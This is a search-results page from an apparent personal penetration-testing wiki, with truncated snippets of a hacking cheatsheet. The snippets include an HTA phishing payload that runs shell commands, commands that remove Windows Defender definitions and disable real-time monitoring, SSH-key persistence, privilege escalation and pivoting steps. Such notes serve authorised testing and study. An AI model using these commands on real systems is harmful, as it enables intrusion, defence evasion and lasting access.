Search Results

30 total results found

Hacking Cheatsheets

1. Enumeration

Hacking Advanced Methodology

Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV -T 4 -sC -oN output.txt If the target is Windows use the below nmap TARGET_IP -Pn -sV -T 4 -sC -oN output.txt #or this if you want to dive deeper nmap TARG...

2. Initial Access

Hacking Advanced Methodology

Phishing

Hacking Advanced Methodology

HTA payloads Ping <html> <head> <script language="JScript"> var shell = new ActiveXObject("WScript.Shell"); var res = shell.Run("ping -n YOUR_IP"); </script> </head> <body> <script language="JScript"> self.close(); </script> </body> </html> ...

3. Privilege Escalation - Windows

Hacking Advanced Methodology

PowerUp Upload the following script to the host /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 Load on the target and run it . .\PowerUp.ps1 Invoke-AllChecks Troubleshoot, make sure the service you are trying to abuse is actua...

4. Post Compromise

Hacking Advanced Methodology

Blast AV and enable RDP with hashes cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM...

5. Persistence

Hacking Advanced Methodology

Linux - SSH On your host cat ~/.ssh/id_rsa.pub # if you don't have one, create it by running: ssh-keygen -t rsa # copy the content of the file into **authorized_keys** on the target host On the target host cd ~/.ssh/ ssh-keygen -t rsa # press enter twice cat id_r...

6. Pivot

Hacking Advanced Methodology

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent ...

Linux AD

Hacking Advanced Methodology

Tools required <https://github.com/its-a-feature/KeytabParser> <https://github.com/sosdave/KeyTabExtract> I usually install them under /opt/linuxad You will need to upload them on to the target host. Extracting keytab data Most likely you will need to ...

Blast Defender

Hacking Advanced Methodology

Via command prompt cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all Just to be safe 🙂 REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM\...

Common Ports

Certifications CREST

Port Service 7 ECHO 9 Discard 13 Daytime 17 QotD (Quote of the Day) 19 Chargen 20 FTP (data) 21 FTP (control) 22 SSH 23 Telnet 43 Whois 49 TACACS+ 53 DNS 67...

TTL

Certifications CREST

The initial TTL value is set by the operating system or application creating the IP packet. Here are some common default TTL values: Operating System TTL Value Linux/MAC OS, Android, Juniper 64 Windows 95, 98, NT 32 Windows 128 Ci...